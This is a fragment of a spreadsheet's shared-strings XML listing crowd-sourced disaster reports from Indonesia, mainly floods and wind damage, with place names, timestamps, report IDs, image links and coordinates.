  </si>
  <si>
    <t>Banjir di Desa Telok Selong Ulu Kecamatan Martapura Barat, ketinggian air dijalan bervariatif 25-40 cm.</t>
  </si>
  <si>
    <t>15:20:52.089</t>
  </si>
  <si>
    <t>9db04e9a-f579-4914-9d92-ef4aba6e7ffe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9db04e9a-f579-4914-9d92-ef4aba6e7ffe.jpg</t>
  </si>
  <si>
    <t>Kejadian banjir di desa Pimping Kabupaten Bulungan</t>
  </si>
  <si>
    <t>Pimping</t>
  </si>
  <si>
    <t>Tanjung Palas Utara</t>
  </si>
  <si>
    <t>Bulungan</t>
  </si>
  <si>
    <t>15:25:40.451</t>
  </si>
  <si>
    <t>5dc57681-f6f2-4e6b-8b02-3fc95fd63c54</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5dc57681-f6f2-4e6b-8b02-3fc95fd63c54.jpg</t>
  </si>
  <si>
    <t>Banjir di desa sekatak Sedang melakukan evakuasi warga yg terdampak"</t>
  </si>
  <si>
    <t>Sekatak Bengara</t>
  </si>
  <si>
    <t>Sekatak</t>
  </si>
  <si>
    <t>04:47:31.224</t>
  </si>
  <si>
    <t>7c28345b-d695-4f96-88a2-bf0fde3bd410</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c28345b-d695-4f96-88a2-bf0fde3bd410.jpg</t>
  </si>
  <si>
    <t>Lokbuntar</t>
  </si>
  <si>
    <t>04:50:58.820</t>
  </si>
  <si>
    <t>73f8a91a-fe4a-4817-82dc-6f8b8e4f5516</t>
  </si>
  <si>
    <t>https://images.petabencana.id/73f8a91a-fe4a-4817-82dc-6f8b8e4f5516.jpg</t>
  </si>
  <si>
    <t>07:54:23.514</t>
  </si>
  <si>
    <t>dc258f23-6ecd-4df9-9593-d9a88970b6ba</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dc258f23-6ecd-4df9-9593-d9a88970b6ba.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi lutut kaki di Jimbaran, Badung</t>
  </si>
  <si>
    <t>Jimbaran</t>
  </si>
  <si>
    <t>07:56:01.256</t>
  </si>
  <si>
    <t>e71af0ad-b0e6-45c2-9534-1e56eae43c5d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e71af0ad-b0e6-45c2-9534-1e56eae43c5d.jpg</t>
  </si>
  <si>
    <t>Timbau</t>
  </si>
  <si>
    <t>Tenggarong</t>
  </si>
  <si>
    <t>08:02:28.881</t>
  </si>
  <si>
    <t>b07eca7d-25ed-4801-b146-664e8ed792b1</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1869", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>08:15:03.959</t>
  </si>
  <si>
    <t>708551b3-32e2-42e7-bec3-c71356d5390c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/708551b3-32e2-42e7-bec3-c71356d5390c.jpg</t>
  </si>
  <si>
    <t>08:29:40.950</t>
  </si>
  <si>
    <t>f364e600-5d76-4321-a94b-50d7e1569672</t>
  </si>
  <si>
    <t>jalan rusak</t>
  </si>
  <si>
    <t>Parhorasan</t>
  </si>
  <si>
    <t>Pangururan</t>
  </si>
  <si>
    <t>Samosir</t>
  </si>
  <si>
    <t>06:40:25.247</t>
  </si>
  <si>
    <t>151f1a42-0aac-4882-81b4-debd33beba5c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/151f1a42-0aac-4882-81b4-debd33beba5c.jpg</t>
  </si>
  <si>
    <t>Jalan melati Desa Bincau muara kec.martapura Masih bisa di lalui roda 4 dan 2</t>
  </si>
  <si>
    <t>Luapan air sungai. Akses jalan tidak bisa dilalui"</t>
  </si>
  <si>
    <t>Tanahmea</t>
  </si>
  <si>
    <t>Banawa Selatan</t>
  </si>
  <si>
    <t>Donggala</t>
  </si>
  <si>
    <t>15:40:41.581</t>
  </si>
  <si>
    <t>76c4775c-94b5-4f01-98b5-70cfd51fc2cf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/76c4775c-94b5-4f01-98b5-70cfd51fc2cf.jpg</t>
  </si>
  <si>
    <t>Banjir menggenangi jalan, rumah dan pasilitas umum lain nya.. Namun aktifitas masyarakat masih normal</t>
  </si>
  <si>
    <t>13:27:44.907</t>
  </si>
  <si>
    <t>b40dc902-c5e3-40af-b1ec-3d8060562249</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b40dc902-c5e3-40af-b1ec-3d8060562249.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "187", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir menghambat lalu lintas di jalan joglo</t>
  </si>
  <si>
    <t>14:44:43.794</t>
  </si>
  <si>
    <t>f15aa3fa-f58d-44d6-a632-3ceec4157732</t>
  </si>
  <si>
    <t>Banjir dari jalan raya sultan agengtirtayasa sampe masuk gang pasar pagi pinang blok k, dan perumahan blok k mengalami k banjiran</t>
  </si>
  <si>
    <t>Kunciran Indah</t>
  </si>
  <si>
    <t>16:04:27.815</t>
  </si>
  <si>
    <t>32f502bd-d579-468b-ba62-61b8e583ce62</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32f502bd-d579-468b-ba62-61b8e583ce62.jpg</t>
  </si>
  <si>
    <t>Pasar buncit, jalan kemang utara. Langganan banjir sehabis hujan deras</t>
  </si>
  <si>
    <t>16:24:27.503</t>
  </si>
  <si>
    <t>f178c994-41e4-49dc-a352-c75d96b1c680</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f178c994-41e4-49dc-a352-c75d96b1c680.jpg</t>
  </si>
  <si>
    <t>Kunciran mas permai full genangan</t>
  </si>
  <si>
    <t>01:25:00.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362970</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/12/21/16400499001277451372.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "662", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sampah di Selokan Senen Butuh Perhatian Pemprov DKI</t>
  </si>
  <si>
    <t>Sampah selokan butuh perhatian khusus dari Pemprov Daerah Khusus Ibukota Jakarta. Sampah Kali di jalan gang Turi ( Sedap Malam ) Kelurahan Kramat Kecamatan Senen Jakarta Pusat.</t>
  </si>
  <si>
    <t>06:18:32.224</t>
  </si>
  <si>
    <t>4987b5cb-cf94-41ba-9aba-ec42817c72ca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4987b5cb-cf94-41ba-9aba-ec42817c72ca.jpg</t>
  </si>
  <si>
    <t>Akses ke Jaksel gabisa dilewatin ya gegara banjir di jalan Ciledug Raya, deket seskoal. Harap mencai jaltik</t>
  </si>
  <si>
    <t>13:17:28.709</t>
  </si>
  <si>
    <t>148da02b-c04d-42e1-ad6f-49393b219c6c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/148da02b-c04d-42e1-ad6f-49393b219c6c.jpg</t>
  </si>
  <si>
    <t>Sore tadi, Terminal 3 Soeta Banjir di area Luar,dan patkiran International</t>
  </si>
  <si>
    <t>Pajang</t>
  </si>
  <si>
    <t>08:21:13.819</t>
  </si>
  <si>
    <t>779679f9-79ce-45bd-9217-2131a8334047</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1532", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>O</t>
  </si>
  <si>
    <t>07:47:47.022</t>
  </si>
  <si>
    <t>f50841e5-9ee7-44e9-9189-0f1b4b4f6cea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f50841e5-9ee7-44e9-9189-0f1b4b4f6cea.jpg</t>
  </si>
  <si>
    <t>Gapura Pasar Lama Roboh akibat hujan deras dan angin kencang. Menunggu petugas</t>
  </si>
  <si>
    <t>07:54:49.479</t>
  </si>
  <si>
    <t>87de9cd4-06e7-4bda-b013-0a8a6df68dce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/87de9cd4-06e7-4bda-b013-0a8a6df68dce.jpg</t>
  </si>
  <si>
    <t>Pohon besar di Jalan Damyati roboh di pertigaan, menutup jalan &amp; menimpa mobil</t>
  </si>
  <si>
    <t>21:47:00.119</t>
  </si>
  <si>
    <t>ab1a3ed0-2dc4-4c5e-a376-d566bd757b29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ab1a3ed0-2dc4-4c5e-a376-d566bd757b29.jpg</t>
  </si>
  <si>
    <t>Hujan disertai amgin puting beliung</t>
  </si>
  <si>
    <t>Blayu</t>
  </si>
  <si>
    <t>Wajak</t>
  </si>
  <si>
    <t>09:21:29.576</t>
  </si>
  <si>
    <t>db8b8e64-16c9-41fa-95f5-6ee649847fc2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/db8b8e64-16c9-41fa-95f5-6ee649847fc2.jpg</t>
  </si>
  <si>
    <t>Palembang plaju Silaberanti ujung.dilanda banjir rumah rumah warga terendam banjir. Sampai dijalan jalan."</t>
  </si>
  <si>
    <t>Silaberanti</t>
  </si>
  <si>
    <t>Seberang Ulu I</t>
  </si>
  <si>
    <t>11:09:59.073</t>
  </si>
  <si>
    <t>f7437830-5908-4978-82dc-351b6bebaae2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7437830-5908-4978-82dc-351b6bebaae2.jpg</t>
  </si>
  <si>
    <t>Pokonya itu</t>
  </si>
  <si>
    <t>Cicalengka Wetan</t>
  </si>
  <si>
    <t>Cicalengka</t>
  </si>
  <si>
    <t>16:58:54.495</t>
  </si>
  <si>
    <t>feafd69d-c160-47f9-9ceb-7e09032f8b8f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/feafd69d-c160-47f9-9ceb-7e09032f8b8f.jpg</t>
  </si>
  <si>
    <t>Kota Bogor terpantau Hujan deras + angin kencang</t>
  </si>
  <si>
    <t>Sindangrasa</t>
  </si>
  <si>
    <t>00:49:55.542</t>
  </si>
  <si>
    <t>f4549c60-c687-48a2-9afc-c7c2606d010a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f4549c60-c687-48a2-9afc-c7c2606d010a.jpg</t>
  </si>
  <si>
    <t>Banjir tak kunjung surut. Malah makin naik jika hujan tiba. Mengganggu monilitas warga, termasuk orang tua saya untuk bekerja</t>
  </si>
  <si>
    <t>Penuguan</t>
  </si>
  <si>
    <t>Pulau Rimau</t>
  </si>
  <si>
    <t>Banyuasin</t>
  </si>
  <si>
    <t>05:57:00.731</t>
  </si>
  <si>
    <t>523cb12f-02be-4836-a48e-728364855330</t>
  </si>
  <si>
    <t>Angin Kencang di Kecamatan Cigombong Kabupaten Bogor Ôûá KRONOLOGIS KEJADIAN Disebabkan hujan dengan intensitas tinggi disertai Angin kencang"</t>
  </si>
  <si>
    <t>Ciburuy</t>
  </si>
  <si>
    <t>Cigombong</t>
  </si>
  <si>
    <t>09:49:30.851</t>
  </si>
  <si>
    <t>fbf703c1-9bf4-4f09-9ca5-d211f9813812</t>
  </si>
  <si>
    <t>Banjir karena hujan deras dari siang hingga malam, pada tanggal 25 Desember 2021.</t>
  </si>
  <si>
    <t>Cirebon Girang</t>
  </si>
  <si>
    <t>Talun</t>
  </si>
  <si>
    <t>02:57:51.818</t>
  </si>
  <si>
    <t>0f400ae8-edb6-45be-af38-7d0f8140fef7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0f400ae8-edb6-45be-af38-7d0f8140fef7.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 104 }</t>
  </si>
  <si>
    <t>banjir bandang menerjang desa sukamukti dan desa maripati, kecamatan sukawengi ,garut</t>
  </si>
  <si>
    <t>Cijolang</t>
  </si>
  <si>
    <t>Blubur Limbangan</t>
  </si>
  <si>
    <t>04:01:31.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/363179</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/12/27/363179-1640577691987517324.mp4-03.jpg</t>
  </si>
  <si>
    <t>Hujan Turun, Tanggul Persawahan di Pringsewu Jebol</t>
  </si>
  <si>
    <t>Belum adanya pembangunan tanggul yang kokoh di persawahan Desa Srirahayu kec.Banyumas Kab.pringsewu Lampung Indonesia sehingga ketika hujan besar turun menyebabkan jebolnya tanggul disekitar persawahan tersebut.. warga masyarakat disekitar berharap besa"</t>
  </si>
  <si>
    <t>Pringsewu</t>
  </si>
  <si>
    <t>08:41:24.037</t>
  </si>
  <si>
    <t>c27e71ae-22c2-48bc-ac97-7aa4217ce651</t>
  </si>
  <si>
    <t>Water Water</t>
  </si>
  <si>
    <t>09:08:11.491</t>
  </si>
  <si>
    <t>cafe722f-b1d4-467f-82e7-6191f201a24b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cafe722f-b1d4-467f-82e7-6191f201a24b.jpg</t>
  </si>
  <si>
    <t>Brigita Aras Soraya Waruwu</t>
  </si>
  <si>
    <t>Ombolata Ulu</t>
  </si>
  <si>
    <t>Gunung Sitoli</t>
  </si>
  <si>
    <t>Gunungsitoli</t>
  </si>
  <si>
    <t>00:18:56.043</t>
  </si>
  <si>
    <t>aca268a8-215f-4dc4-870c-eb5ca83446e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aca268a8-215f-4dc4-870c-eb5ca83446e4.jpg</t>
  </si>
  <si>
    <t>Laporan awal. Air sungai meluap akibat curah hujan. Belum ada fasum terdampak. Air menutup jalan poros Propinsi Karangan #Youth4GotongRoyong"</t>
  </si>
  <si>
    <t>Karangan Hilir</t>
  </si>
  <si>
    <t>Karangan</t>
  </si>
  <si>
    <t>01:23:43.144</t>
  </si>
  <si>
    <t>8f41806c-9d86-47a8-b52a-28cf0ec0a0be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f41806c-9d86-47a8-b52a-28cf0ec0a0be.jpg</t>
  </si>
  <si>
    <t>Luapan air sungai Karangan masuk ke pemukiman Desa Karangan Ilir Belum ada Fasum terdampak #Youth4GotongRoyong"</t>
  </si>
  <si>
    <t>08:00:13.901</t>
  </si>
  <si>
    <t>d1bcdbc7-1819-41aa-b5fe-34d0162bb084</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "678", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir lah pokoknya</t>
  </si>
  <si>
    <t>10:49:48.763</t>
  </si>
  <si>
    <t>ee548663-23ad-4adb-8d85-f8c64b1fbb6c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ee548663-23ad-4adb-8d85-f8c64b1fbb6c.jpg</t>
  </si>
  <si>
    <t>saluran irigasi yg di kelola desa dengan buruk,merugikan masyarakat, permintaan perbaikan di tolak langsung kepala desa Purwajaya,kab.Ciamis</t>
  </si>
  <si>
    <t>Purwadadi</t>
  </si>
  <si>
    <t>07:22:30.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/363227</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/12/29/16407625501887769697.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2674", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Perhatian! Ada Genangan Air di Jalan Arteri JORR Jatiwarna</t>
  </si>
  <si>
    <t>Terdapat genangan air di Jalan Arteri Jorr Jatiwarna. Genangan ini mungkin bersumber dari saluran air yang kurang baik, karena tidak hujan pun, genangan air ini tetap ada. Butuh perhatian atas genangan air yang terjadi di jalan tersebut.</t>
  </si>
  <si>
    <t>09:32:41.979</t>
  </si>
  <si>
    <t>14171753-a6db-40e7-8acf-31dec5dff2d6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/14171753-a6db-40e7-8acf-31dec5dff2d6.jpg</t>
  </si>
  <si>
    <t>banjir akibat hujan dan banyak nya sampah membuat mampet di sungai</t>
  </si>
  <si>
    <t>Banjar Anyar</t>
  </si>
  <si>
    <t>#sarjepara"</t>
  </si>
  <si>
    <t>longitude</t>
  </si>
  <si>
    <t>latitude</t>
  </si>
  <si>
    <t>0.69967</t>
  </si>
  <si>
    <t>0.65670</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.47392</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.45033</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.46971</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.48026</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.47385</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.47543</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.42751</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.47246</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.46958</t>
  </si>
  <si>
    <t>0.47830</t>
  </si>
  <si>
    <t>0.52513</t>
  </si>
  <si>
    <t>0.90582</t>
  </si>
  <si>
    <t>0.52416</t>
  </si>
  <si>
    <t>0.83425</t>
  </si>
  <si>
    <t>0.28861</t>
  </si>
  <si>
    <t>0.85261</t>
  </si>
  <si>
    <t>0.90225</t>
  </si>
  <si>
    <t>0.38546</t>
  </si>
  <si>
    <t>0.78879</t>
  </si>
  <si>
    <t>0.53342</t>
  </si>
  <si>
    <t>0.855217408</t>
  </si>
  <si>
    <t>106.76866</t>
  </si>
  <si>
    <t>106.97870</t>
  </si>
  <si>
    <t>106.89100</t>
  </si>
  <si>
    <t>107.16189</t>
  </si>
  <si>
    <t>106.86092</t>
  </si>
  <si>
    <t>106.73835</t>
  </si>
  <si>
    <t>106.98668</t>
  </si>
  <si>
    <t>106.74001</t>
  </si>
  <si>
    <t>106.72181</t>
  </si>
  <si>
    <t>106.99478</t>
  </si>
  <si>
    <t>106.76476</t>
  </si>
  <si>
    <t>107.02225</t>
  </si>
  <si>
    <t>106.82927</t>
  </si>
  <si>
    <t>106.95966</t>
  </si>
  <si>
    <t>106.81001</t>
  </si>
  <si>
    <t>106.89524</t>
  </si>
  <si>
    <t>107.00423</t>
  </si>
  <si>
    <t>106.95063</t>
  </si>
  <si>
    <t>106.98030</t>
  </si>
  <si>
    <t>106.76545</t>
  </si>
  <si>
    <t>106.81166</t>
  </si>
  <si>
    <t>106.77164</t>
  </si>
  <si>
    <t>106.72077</t>
  </si>
  <si>
    <t>107.02553</t>
  </si>
  <si>
    <t>106.82717</t>
  </si>
  <si>
    <t>106.84160</t>
  </si>
  <si>
    <t>106.68569</t>
  </si>
  <si>
    <t>106.70425</t>
  </si>
  <si>
    <t>106.70047</t>
  </si>
  <si>
    <t>106.70164</t>
  </si>
  <si>
    <t>106.70307</t>
  </si>
  <si>
    <t>106.78416</t>
  </si>
  <si>
    <t>106.82298</t>
  </si>
  <si>
    <t>106.82674</t>
  </si>
  <si>
    <t>106.74954</t>
  </si>
  <si>
    <t>106.72111</t>
  </si>
  <si>
    <t>106.74783</t>
  </si>
  <si>
    <t>106.74098</t>
  </si>
  <si>
    <t>106.74752</t>
  </si>
  <si>
    <t>106.63012</t>
  </si>
  <si>
    <t>106.80234</t>
  </si>
  <si>
    <t>106.74504</t>
  </si>
  <si>
    <t>106.66424</t>
  </si>
  <si>
    <t>106.87850</t>
  </si>
  <si>
    <t>106.95030</t>
  </si>
  <si>
    <t>106.89135</t>
  </si>
  <si>
    <t>106.86342</t>
  </si>
  <si>
    <t>106.86722</t>
  </si>
  <si>
    <t>107.00859</t>
  </si>
  <si>
    <t>106.83314</t>
  </si>
  <si>
    <t>106.83756</t>
  </si>
  <si>
    <t>107.01213</t>
  </si>
  <si>
    <t>106.71621</t>
  </si>
  <si>
    <t>106.85439</t>
  </si>
  <si>
    <t>106.85436</t>
  </si>
  <si>
    <t>106.85902</t>
  </si>
  <si>
    <t>106.78829</t>
  </si>
  <si>
    <t>106.78974</t>
  </si>
  <si>
    <t>106.78831</t>
  </si>
  <si>
    <t>106.78905</t>
  </si>
  <si>
    <t>106.76774</t>
  </si>
  <si>
    <t>106.78175</t>
  </si>
  <si>
    <t>107.00508</t>
  </si>
  <si>
    <t>106.70988</t>
  </si>
  <si>
    <t>106.77093</t>
  </si>
  <si>
    <t>106.76796</t>
  </si>
  <si>
    <t>106.83857</t>
  </si>
  <si>
    <t>106.97480</t>
  </si>
  <si>
    <t>106.75442</t>
  </si>
  <si>
    <t>106.99019</t>
  </si>
  <si>
    <t>106.71737</t>
  </si>
  <si>
    <t>106.74994</t>
  </si>
  <si>
    <t>106.77877</t>
  </si>
  <si>
    <t>106.83563</t>
  </si>
  <si>
    <t>106.69271</t>
  </si>
  <si>
    <t>106.98853</t>
  </si>
  <si>
    <t>106.74044</t>
  </si>
  <si>
    <t>106.80215</t>
  </si>
  <si>
    <t>106.86718</t>
  </si>
  <si>
    <t>106.63035</t>
  </si>
  <si>
    <t>106.72097</t>
  </si>
  <si>
    <t>106.82946</t>
  </si>
  <si>
    <t>107.16339</t>
  </si>
  <si>
    <t>106.98724</t>
  </si>
  <si>
    <t>106.83496</t>
  </si>
  <si>
    <t>106.96756</t>
  </si>
  <si>
    <t>106.77001</t>
  </si>
  <si>
    <t>106.76472</t>
  </si>
  <si>
    <t>106.83639</t>
  </si>
  <si>
    <t>106.83152</t>
  </si>
  <si>
    <t>106.75816</t>
  </si>
  <si>
    <t>106.77038</t>
  </si>
  <si>
    <t>106.75244</t>
  </si>
  <si>
    <t>106.78084</t>
  </si>
  <si>
    <t>106.87852</t>
  </si>
  <si>
    <t>106.76469</t>
  </si>
  <si>
    <t>106.76359</t>
  </si>
  <si>
    <t>106.75578</t>
  </si>
  <si>
    <t>106.73306</t>
  </si>
  <si>
    <t>107.02868</t>
  </si>
  <si>
    <t>106.73851</t>
  </si>
  <si>
    <t>106.76572</t>
  </si>
  <si>
    <t>106.86539</t>
  </si>
  <si>
    <t>106.72342</t>
  </si>
  <si>
    <t>107.04063</t>
  </si>
  <si>
    <t>106.73870</t>
  </si>
  <si>
    <t>106.94958</t>
  </si>
  <si>
    <t>106.77272</t>
  </si>
  <si>
    <t>106.74309</t>
  </si>
  <si>
    <t>106.71530</t>
  </si>
  <si>
    <t>106.78458</t>
  </si>
  <si>
    <t>106.76788</t>
  </si>
  <si>
    <t>106.71899</t>
  </si>
  <si>
    <t>106.74761</t>
  </si>
  <si>
    <t>106.77904</t>
  </si>
  <si>
    <t>106.86500</t>
  </si>
  <si>
    <t>107.04081</t>
  </si>
  <si>
    <t>106.77121</t>
  </si>
  <si>
    <t>106.96830</t>
  </si>
  <si>
    <t>106.77875</t>
  </si>
  <si>
    <t>106.76358</t>
  </si>
  <si>
    <t>106.73404</t>
  </si>
  <si>
    <t>106.65226</t>
  </si>
  <si>
    <t>106.67828</t>
  </si>
  <si>
    <t>106.84045</t>
  </si>
  <si>
    <t>106.71628</t>
  </si>
  <si>
    <t>106.73065</t>
  </si>
  <si>
    <t>106.67836</t>
  </si>
  <si>
    <t>106.86717</t>
  </si>
  <si>
    <t>106.78060</t>
  </si>
  <si>
    <t>106.83671</t>
  </si>
  <si>
    <t>106.74462</t>
  </si>
  <si>
    <t>106.78065</t>
  </si>
  <si>
    <t>106.76700</t>
  </si>
  <si>
    <t>106.61001</t>
  </si>
  <si>
    <t>106.78327</t>
  </si>
  <si>
    <t>106.79090</t>
  </si>
  <si>
    <t>106.76829</t>
  </si>
  <si>
    <t>106.69638</t>
  </si>
  <si>
    <t>106.69636</t>
  </si>
  <si>
    <t>106.69637</t>
  </si>
  <si>
    <t>106.76848</t>
  </si>
  <si>
    <t>106.77273</t>
  </si>
  <si>
    <t>106.83016</t>
  </si>
  <si>
    <t>106.78374</t>
  </si>
  <si>
    <t>106.71309</t>
  </si>
  <si>
    <t>106.78325</t>
  </si>
  <si>
    <t>106.77499</t>
  </si>
  <si>
    <t>106.86888</t>
  </si>
  <si>
    <t>106.75893</t>
  </si>
  <si>
    <t>106.77110</t>
  </si>
  <si>
    <t>106.86632</t>
  </si>
  <si>
    <t>106.86312</t>
  </si>
  <si>
    <t>106.78136</t>
  </si>
  <si>
    <t>106.70079</t>
  </si>
  <si>
    <t>106.95150</t>
  </si>
  <si>
    <t>106.72183</t>
  </si>
  <si>
    <t>106.76979</t>
  </si>
  <si>
    <t>106.76413</t>
  </si>
  <si>
    <t>106.76995</t>
  </si>
  <si>
    <t>106.73864</t>
  </si>
  <si>
    <t>106.77375</t>
  </si>
  <si>
    <t>106.69904</t>
  </si>
  <si>
    <t>106.77856</t>
  </si>
  <si>
    <t>106.78242</t>
  </si>
  <si>
    <t>106.78056</t>
  </si>
  <si>
    <t>106.78250</t>
  </si>
  <si>
    <t>106.73321</t>
  </si>
  <si>
    <t>106.77840</t>
  </si>
  <si>
    <t>106.71543</t>
  </si>
  <si>
    <t>106.89623</t>
  </si>
  <si>
    <t>106.77532</t>
  </si>
  <si>
    <t>106.77687</t>
  </si>
  <si>
    <t>106.68870</t>
  </si>
  <si>
    <t>106.78103</t>
  </si>
  <si>
    <t>106.78408</t>
  </si>
  <si>
    <t>106.70114</t>
  </si>
  <si>
    <t>106.77878</t>
  </si>
  <si>
    <t>106.73956</t>
  </si>
  <si>
    <t>106.72841</t>
  </si>
  <si>
    <t>107.00473</t>
  </si>
  <si>
    <t>106.71435</t>
  </si>
  <si>
    <t>106.73619</t>
  </si>
  <si>
    <t>106.76031</t>
  </si>
  <si>
    <t>106.97765</t>
  </si>
  <si>
    <t>106.77224</t>
  </si>
  <si>
    <t>106.74427</t>
  </si>
  <si>
    <t>106.74588</t>
  </si>
  <si>
    <t>106.76534</t>
  </si>
  <si>
    <t>106.79213</t>
  </si>
  <si>
    <t>106.78271</t>
  </si>
  <si>
    <t>107.05216</t>
  </si>
  <si>
    <t>107.01728</t>
  </si>
  <si>
    <t>106.83674</t>
  </si>
  <si>
    <t>106.98220</t>
  </si>
  <si>
    <t>106.84043</t>
  </si>
  <si>
    <t>106.77271</t>
  </si>
  <si>
    <t>106.90478</t>
  </si>
  <si>
    <t>106.87946</t>
  </si>
  <si>
    <t>106.87441</t>
  </si>
  <si>
    <t>106.77983</t>
  </si>
  <si>
    <t>106.78224</t>
  </si>
  <si>
    <t>106.89499</t>
  </si>
  <si>
    <t>106.73433</t>
  </si>
  <si>
    <t>106.72476</t>
  </si>
  <si>
    <t>106.72779</t>
  </si>
  <si>
    <t>106.72716</t>
  </si>
  <si>
    <t>106.86756</t>
  </si>
  <si>
    <t>106.78035</t>
  </si>
  <si>
    <t>106.86515</t>
  </si>
  <si>
    <t>106.74623</t>
  </si>
  <si>
    <t>106.83635</t>
  </si>
  <si>
    <t>106.95301</t>
  </si>
  <si>
    <t>106.76366</t>
  </si>
  <si>
    <t>106.71346</t>
  </si>
  <si>
    <t>106.86343</t>
  </si>
  <si>
    <t>106.89469</t>
  </si>
  <si>
    <t>106.77346</t>
  </si>
  <si>
    <t>106.77933</t>
  </si>
  <si>
    <t>106.86730</t>
  </si>
  <si>
    <t>106.89664</t>
  </si>
  <si>
    <t>106.84420</t>
  </si>
  <si>
    <t>109.88884</t>
  </si>
  <si>
    <t>106.77952</t>
  </si>
  <si>
    <t>106.77771</t>
  </si>
  <si>
    <t>106.72743</t>
  </si>
  <si>
    <t>106.71726</t>
  </si>
  <si>
    <t>106.83513</t>
  </si>
  <si>
    <t>106.76215</t>
  </si>
  <si>
    <t>106.78326</t>
  </si>
  <si>
    <t>106.76937</t>
  </si>
  <si>
    <t>106.82113</t>
  </si>
  <si>
    <t>106.77824</t>
  </si>
  <si>
    <t>106.77338</t>
  </si>
  <si>
    <t>106.77947</t>
  </si>
  <si>
    <t>106.71632</t>
  </si>
  <si>
    <t>106.77275</t>
  </si>
  <si>
    <t>106.74590</t>
  </si>
  <si>
    <t>106.77324</t>
  </si>
  <si>
    <t>106.63337</t>
  </si>
  <si>
    <t>106.77025</t>
  </si>
  <si>
    <t>111.53502</t>
  </si>
  <si>
    <t>106.70091</t>
  </si>
  <si>
    <t>106.77519</t>
  </si>
  <si>
    <t>106.77754</t>
  </si>
  <si>
    <t>106.80906</t>
  </si>
  <si>
    <t>106.74247</t>
  </si>
  <si>
    <t>106.77739</t>
  </si>
  <si>
    <t>106.74004</t>
  </si>
  <si>
    <t>106.76222</t>
  </si>
  <si>
    <t>106.94406</t>
  </si>
  <si>
    <t>107.04339</t>
  </si>
  <si>
    <t>106.76006</t>
  </si>
  <si>
    <t>106.77107</t>
  </si>
  <si>
    <t>106.77257</t>
  </si>
  <si>
    <t>107.05544</t>
  </si>
  <si>
    <t>106.74776</t>
  </si>
  <si>
    <t>106.80708</t>
  </si>
  <si>
    <t>106.71660</t>
  </si>
  <si>
    <t>106.80848</t>
  </si>
  <si>
    <t>106.85944</t>
  </si>
  <si>
    <t>116.84089</t>
  </si>
  <si>
    <t>106.78770</t>
  </si>
  <si>
    <t>106.73393</t>
  </si>
  <si>
    <t>106.90370</t>
  </si>
  <si>
    <t>106.73892</t>
  </si>
  <si>
    <t>106.86719</t>
  </si>
  <si>
    <t>110.44519</t>
  </si>
  <si>
    <t>106.75585</t>
  </si>
  <si>
    <t>112.74170</t>
  </si>
  <si>
    <t>106.91648</t>
  </si>
  <si>
    <t>106.74618</t>
  </si>
  <si>
    <t>110.45876</t>
  </si>
  <si>
    <t>112.49107</t>
  </si>
  <si>
    <t>106.86687</t>
  </si>
  <si>
    <t>106.99936</t>
  </si>
  <si>
    <t>106.74167</t>
  </si>
  <si>
    <t>110.77282</t>
  </si>
  <si>
    <t>110.67366</t>
  </si>
  <si>
    <t>110.69324</t>
  </si>
  <si>
    <t>106.85821</t>
  </si>
  <si>
    <t>112.55836</t>
  </si>
  <si>
    <t>110.46563</t>
  </si>
  <si>
    <t>103.71952</t>
  </si>
  <si>
    <t>110.65954</t>
  </si>
  <si>
    <t>106.86707</t>
  </si>
  <si>
    <t>106.86870</t>
  </si>
  <si>
    <t>106.86873</t>
